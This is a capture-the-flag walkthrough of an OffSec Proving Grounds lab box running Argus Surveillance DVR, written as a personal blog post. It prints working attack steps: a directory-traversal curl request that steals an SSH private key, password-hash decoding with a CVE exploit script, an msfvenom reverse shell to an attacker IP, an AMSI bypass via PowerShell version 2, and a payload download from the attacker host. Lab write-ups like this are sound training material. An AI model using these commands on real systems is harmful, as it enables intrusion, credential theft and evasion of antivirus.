DVR4 Walkthrough- Proving Grounds OffSec
This box was pretty frustrating toward the end and you can see why in my livestream from Mr. Robot Monday. Overall I'd give it an intermediate rating though, not necessarily hard in difficulty.
I started out by setting the IP to a variable in my environment and named it "IP".
export IP=192.168.217.179Next I ran an nmap scan on the box for all open ports.
nmap -Pn -p- $IP -o nmap.txt
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 107.08 secondsAfter that I ran a script scan and version scan on the open ports that were found.
nmap -Pn -sV -sC -p 22,8080 $IP
PORT STATE SERVICE VERSION
22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
| 3072 2125f053b4990f34de2dcabc5dfe20ce (RSA)
|_ 384 e796f36ad892075abf3706860a317319 (ECDSA)
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Connection: Keep-Alive
| Keep-Alive: timeout=15, max=4
| Content-Type: text/html
| Content-Length: 985
|
|
|
|
|
|
|
|
|
|
|_http-title: Argus Surveillance DVR
|_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://nmap.org/cgi-bin/submit.cgi?new-service :I searched for an exploit for the ssh version but was unsuccessful. I then focused to the web server at port 8080. I went to it in the browser.
As the name of the CTF suggests, this is a DVR for cameras. I looked around and found some usernames in the users page.
Now I had usernames "Administrator" and "viewer". I looked around at the help page and found an about page with a version number of the software running.
Once I found that version number, I went to Google to see if I could find an exploit.
As you can see, I found 3 pages that listed exploits. The first one "Weak Password Encryption" involved locating passwords after logged in. So I assumed that could be a priv esc vector. I then looked at the Directory Traversal exploit.
I copied the exact URL that was posted in this exploit and pasted it to my browser and was able to see that it did work!
I decided to use curl as the formatting is always neater with using curl. I got the same result.
curl "http://$IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
After some trial and error, spelling mistakes, and trying to remember where ssh keys are held in Windows, I was able to retrieve a private key from the User "Viewer".
curl "http://$IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
I then copied and pasted the private key into a file named "id_rsa" and changed the permissions on it, and ssh'd in to the machine as the account Viewer.
chmod 600 id_rsa
ssh -i id_rsa viewer@$IP
Now that I was in, I grabbed the local.txt flag and submitted it. I then remembered the other exploit I saw for "Weak Password Encryption". It listed a file that contained password hashes.
I also noticed that the author said "I'm too lazy to add special characters". I looked at the code and realized it was just decoding the letters individually. With the key he had we could have done this by hand, just would have taken a few minutes longer. So I wanted to see if someone wasn't as lazy and had included special characters in case our passwords had them. The other exploit I found, which was on github, said in the description that they included special characters.
I went to where the exploit said the password hashes were stored, and I displayed the contents.
C:\ProgramData\PY_Software\Argus Surveillance DVR>type DVRParams.ini
I found this section that had a password hash for the login name Administrator. Further down I saw a hash for Viewer.
Administrator: ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Viewer: 5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFENow that we have hashes for two users, I needed to decode them using the script I found on Github.
python2 CVE-2022-25012.py 5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE
python2 CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Awesome! Now we have passwords for both users!
Administrator: ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 14WatchD0g$
Viewer: 5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE ImWatchingY0uI tried logging in via ssh to the administrator account and was unsuccessful. I assumed Admin logging was not enabled. I knew that since I had the password for the admin account, I could use runas to run anything as the administrator and impersonate them. So I created a stageless reverse shell using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.160 LPORT=443 -f exe > shell.exe
Then I set up a netcat listener on my Kali machine to port 443. I used a common port in fear of restrictions on ports like 4444.
nc -nvlp 443Then this is where I had a rough time. I was expecting to use certutil to simply transfer over the shell.exe file. I kept getting "Access Denied" as you can see in my video of doing this. I couldn't figure out why I couldn't download things to my own desktop directory. I switched to PowerShell and tried to run it, and it showed me exactly why.
I'm going to trademark a phrase for t-shirts that says "AMSI GOT ME!". That's exactly what happened. The AV on the machine was stopping the download while using certutil. After some searching and a quick reminder from my current GPEN class, PowerShell version 2 is a simple way to bypass AMSI. So that's what I did.
powershell -version 2
Invoke-WebRequest "http://192.168.45.160/shell.exe" -OutFile "C:\Users\Viewer\shell.exe"This time it worked! Now all I had to do was execute the shell.exe as the administrator user.
runas /user:administrator "C:\users\viewer\shell.exe"
I ran it, entered the password we had, and caught a reverse shell on the listener I set up!
While this seems very simple, you should watch the video I made of doing this to see the frustrations and having to try a few different things. It was a good box and reminded me very quickly that most hosts have some kind of AV installed on them and I need to remember bypass methods for those hosts. All in all, this was an awesome box and I'm glad I chose it.
-Sam
